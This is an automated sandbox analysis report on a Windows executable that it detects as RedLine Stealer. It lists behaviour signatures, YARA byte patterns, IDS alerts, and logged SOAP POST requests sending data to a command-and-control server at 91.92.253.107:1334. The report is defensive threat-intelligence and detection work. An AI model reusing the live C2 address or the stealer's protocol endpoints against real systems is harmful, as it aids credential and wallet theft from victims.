Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1505135
MD5:6a94b94ba557d5d85a1da20213d48974
SHA1:a311aa3a9243849b883867fa3d772e4c4e95d080
SHA256:e4a125aa374a939c07ee3172dd5cdb23990096efe7059e9d647f1eaadc32e3dd
Tags:exe
Infos:

Detection

RedLine
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected RedLine Stealer
AI detected suspicious sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 7056 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 6A94B94BA557D5D85A1DA20213D48974)
    • WerFault.exe (PID: 6336 cmdline: C:\Windows\system32\WerFault.exe -u -p 7056 -s 2356 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
No configs have been found
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000002.1955852454.000001D6098B0000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
      • 0x19788:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
      • 0x1ccbe:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
      00000000.00000002.1955043289.000001D60971C000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
      • 0x1f7d8:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
      • 0x22d0e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
      00000000.00000002.1954884538.000001D6096B7000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
      • 0xf0b8:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
      • 0x125ee:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
      Process Memory Space: file.exe PID: 7056JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: file.exe PID: 7056JoeSecurity_RedLineYara detected RedLine StealerJoe Security
          No Sigma rule has matched
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-05T20:25:20.137045+020020450001Malware Command and Control Activity Detected91.92.253.1071334192.168.2.449730TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-05T20:25:29.302629+020020460561A Network Trojan was detected91.92.253.1071334192.168.2.449730TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-05T20:25:29.302629+020020450011Malware Command and Control Activity Detected91.92.253.1071334192.168.2.449730TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-05T20:25:15.140795+020028496621Malware Command and Control Activity Detected192.168.2.44973091.92.253.1071334TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-05T20:25:20.343929+020028493511Malware Command and Control Activity Detected192.168.2.44973091.92.253.1071334TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-05T20:25:31.583999+020028482001Malware Command and Control Activity Detected192.168.2.44973391.92.253.1071334TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-05T20:25:29.711888+020028493521Malware Command and Control Activity Detected192.168.2.44973291.92.253.1071334TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: System.Runtime.Serialization.ni.pdb source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Xml.ni.pdb source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.pdb` source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Runtime.Serialization.ni.pdbRSDSg@h source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.ni.pdbRSDS source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Windows.Forms.ni.pdb source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Drawing.ni.pdb source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Management.pdbp source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Configuration.ni.pdb source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Net.Http.pdb source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.ServiceModel.pdb source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Configuration.pdb source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Drawing.ni.pdbRSDS source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Xml.pdb source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.pdb source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Xml.ni.pdbRSDS# source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Core.ni.pdb source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Windows.Forms.pdb source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: mscorlib.pdb source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Net.Http.ni.pdb source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Drawing.pdb source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Management.pdb source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: mscorlib.ni.pdb source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Management.ni.pdb source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.ServiceModel.ni.pdbRSDS source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Core.pdb source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Runtime.Serialization.pdb source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Xml.pdb3X2 source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Net.Http.ni.pdbRSDS source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.ServiceModel.pdb0 source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.ni.pdb source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Core.ni.pdbRSDS source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.ServiceModel.ni.pdb source: WERB6FD.tmp.dmp.4.dr

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49730 -> 91.92.253.107:1334
          Source: Network trafficSuricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 91.92.253.107:1334 -> 192.168.2.4:49730
          Source: Network trafficSuricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.4:49730 -> 91.92.253.107:1334
          Source: Network trafficSuricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 91.92.253.107:1334 -> 192.168.2.4:49730
          Source: Network trafficSuricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 91.92.253.107:1334 -> 192.168.2.4:49730
          Source: Network trafficSuricata IDS: 2848200 - Severity 1 - ETPRO MALWARE RedLine - GetUpdates Request : 192.168.2.4:49733 -> 91.92.253.107:1334
          Source: Network trafficSuricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.4:49732 -> 91.92.253.107:1334
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 1334
          Source: unknownNetwork traffic detected: HTTP traffic on port 1334 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 1334
          Source: unknownNetwork traffic detected: HTTP traffic on port 1334 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 1334 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 1334
          Source: unknownNetwork traffic detected: HTTP traffic on port 1334 -> 49732
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1334
          Source: unknownNetwork traffic detected: HTTP traffic on port 1334 -> 49733
          Source: global trafficTCP traffic: 192.168.2.4:49730 -> 91.92.253.107:1334
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 91.92.253.107:1334Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 91.92.253.107:1334Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 91.92.253.107:1334Content-Length: 955746Expect: 100-continueAccept-Encoding: gzip, deflate
          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 91.92.253.107:1334Content-Length: 955738Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
          Source: Joe Sandbox ViewASN Name: THEZONEBG THEZONEBG
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: unknownTCP traffic detected without corresponding DNS query: 91.92.253.107
          Source: global trafficDNS traffic detected: DNS query: api.ip.sb
          Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 91.92.253.107:1334Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
          Source: file.exe, 00000000.00000002.1956078575.000001D60B620000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.92.253.1
          Source: file.exe, 00000000.00000002.1956078575.000001D60B612000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.92.253.107:1334
          Source: file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.92.253.107:1334/
          Source: file.exe, 00000000.00000002.1956078575.000001D60B612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.92.253.107:13342b
          Source: file.exe, 00000000.00000002.1956078575.000001D60B499000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
          Source: file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
          Source: file.exe, 00000000.00000002.1956078575.000001D60B47E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
          Source: file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
          Source: file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
          Source: file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
          Source: file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: file.exe, 00000000.00000002.1956078575.000001D60B47E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
          Source: file.exe, 00000000.00000002.1956078575.000001D60B44A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0v
          Source: file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
          Source: file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
          Source: file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
          Source: file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
          Source: file.exe, 00000000.00000002.1956078575.000001D60B612000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1956078575.000001D60B44A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1956078575.000001D60B47E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
          Source: file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
          Source: file.exe, 00000000.00000002.1956078575.000001D60B620000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnv
          Source: file.exe, 00000000.00000002.1956078575.000001D60B620000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
          Source: file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
          Source: file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
          Source: file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
          Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
          Source: file.exe, 00000000.00000003.1735599246.000001D61B635000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B6E7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B583000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1736302201.000001D624198000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B68E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B5DC000.00000004.00000800.00020000.00000000.sdmp, tmp1AE8.tmp.0.dr, tmp529A.tmp.0.dr, tmp52AB.tmp.0.dr, tmp5288.tmp.0.dr, tmp5299.tmp.0.dr, tmp5257.tmp.0.dr, tmp89E9.tmp.0.dr, tmp89B9.tmp.0.dr, tmp1B29.tmp.0.dr, tmp1B19.tmp.0.dr, tmp1B08.tmp.0.dr, tmp5268.tmp.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: file.exe, 00000000.00000002.1956078575.000001D60B44A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb
          Source: file.exe, 00000000.00000002.1956078575.000001D60B44A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip
          Source: file.exe, 00000000.00000003.1735599246.000001D61B635000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B6E7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B583000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1736302201.000001D624198000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B68E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B5DC000.00000004.00000800.00020000.00000000.sdmp, tmp1AE8.tmp.0.dr, tmp529A.tmp.0.dr, tmp52AB.tmp.0.dr, tmp5288.tmp.0.dr, tmp5299.tmp.0.dr, tmp5257.tmp.0.dr, tmp89E9.tmp.0.dr, tmp89B9.tmp.0.dr, tmp1B29.tmp.0.dr, tmp1B19.tmp.0.dr, tmp1B08.tmp.0.dr, tmp5268.tmp.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: file.exe, 00000000.00000003.1735599246.000001D61B635000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B6E7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B583000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1736302201.000001D624198000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B68E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B5DC000.00000004.00000800.00020000.00000000.sdmp, tmp1AE8.tmp.0.dr, tmp529A.tmp.0.dr, tmp52AB.tmp.0.dr, tmp5288.tmp.0.dr, tmp5299.tmp.0.dr, tmp5257.tmp.0.dr, tmp89E9.tmp.0.dr, tmp89B9.tmp.0.dr, tmp1B29.tmp.0.dr, tmp1B19.tmp.0.dr, tmp1B08.tmp.0.dr, tmp5268.tmp.0.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: file.exe, 00000000.00000003.1735599246.000001D61B635000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B6E7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B583000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1736302201.000001D624198000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B68E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B5DC000.00000004.00000800.00020000.00000000.sdmp, tmp1AE8.tmp.0.dr, tmp529A.tmp.0.dr, tmp52AB.tmp.0.dr, tmp5288.tmp.0.dr, tmp5299.tmp.0.dr, tmp5257.tmp.0.dr, tmp89E9.tmp.0.dr, tmp89B9.tmp.0.dr, tmp1B29.tmp.0.dr, tmp1B19.tmp.0.dr, tmp1B08.tmp.0.dr, tmp5268.tmp.0.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: file.exe, 00000000.00000003.1735599246.000001D61B635000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B6E7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B583000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1736302201.000001D624198000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B68E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B5DC000.00000004.00000800.00020000.00000000.sdmp, tmp1AE8.tmp.0.dr, tmp529A.tmp.0.dr, tmp52AB.tmp.0.dr, tmp5288.tmp.0.dr, tmp5299.tmp.0.dr, tmp5257.tmp.0.dr, tmp89E9.tmp.0.dr, tmp89B9.tmp.0.dr, tmp1B29.tmp.0.dr, tmp1B19.tmp.0.dr, tmp1B08.tmp.0.dr, tmp5268.tmp.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: file.exe, 00000000.00000003.1735599246.000001D61B635000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B6E7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B583000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1736302201.000001D624198000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B68E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B5DC000.00000004.00000800.00020000.00000000.sdmp, tmp1AE8.tmp.0.dr, tmp529A.tmp.0.dr, tmp52AB.tmp.0.dr, tmp5288.tmp.0.dr, tmp5299.tmp.0.dr, tmp5257.tmp.0.dr, tmp89E9.tmp.0.dr, tmp89B9.tmp.0.dr, tmp1B29.tmp.0.dr, tmp1B19.tmp.0.dr, tmp1B08.tmp.0.dr, tmp5268.tmp.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: file.exe, 00000000.00000003.1735599246.000001D61B635000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B6E7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B583000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1736302201.000001D624198000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B68E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B5DC000.00000004.00000800.00020000.00000000.sdmp, tmp1AE8.tmp.0.dr, tmp529A.tmp.0.dr, tmp52AB.tmp.0.dr, tmp5288.tmp.0.dr, tmp5299.tmp.0.dr, tmp5257.tmp.0.dr, tmp89E9.tmp.0.dr, tmp89B9.tmp.0.dr, tmp1B29.tmp.0.dr, tmp1B19.tmp.0.dr, tmp1B08.tmp.0.dr, tmp5268.tmp.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: file.exe, 00000000.00000003.1735599246.000001D61B635000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B6E7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B583000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1736302201.000001D624198000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B68E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B5DC000.00000004.00000800.00020000.00000000.sdmp, tmp1AE8.tmp.0.dr, tmp529A.tmp.0.dr, tmp52AB.tmp.0.dr, tmp5288.tmp.0.dr, tmp5299.tmp.0.dr, tmp5257.tmp.0.dr, tmp89E9.tmp.0.dr, tmp89B9.tmp.0.dr, tmp1B29.tmp.0.dr, tmp1B19.tmp.0.dr, tmp1B08.tmp.0.dr, tmp5268.tmp.0.drString found in binary or memory: https://www.ecosia.org/newtab/
          Source: file.exe, 00000000.00000003.1735599246.000001D61B635000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B6E7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B583000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1736302201.000001D624198000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B68E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B5DC000.00000004.00000800.00020000.00000000.sdmp, tmp1AE8.tmp.0.dr, tmp529A.tmp.0.dr, tmp52AB.tmp.0.dr, tmp5288.tmp.0.dr, tmp5299.tmp.0.dr, tmp5257.tmp.0.dr, tmp89E9.tmp.0.dr, tmp89B9.tmp.0.dr, tmp1B29.tmp.0.dr, tmp1B19.tmp.0.dr, tmp1B08.tmp.0.dr, tmp5268.tmp.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

          System Summary

          barindex
          Source: 00000000.00000002.1955852454.000001D6098B0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
          Source: 00000000.00000002.1955043289.000001D60971C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
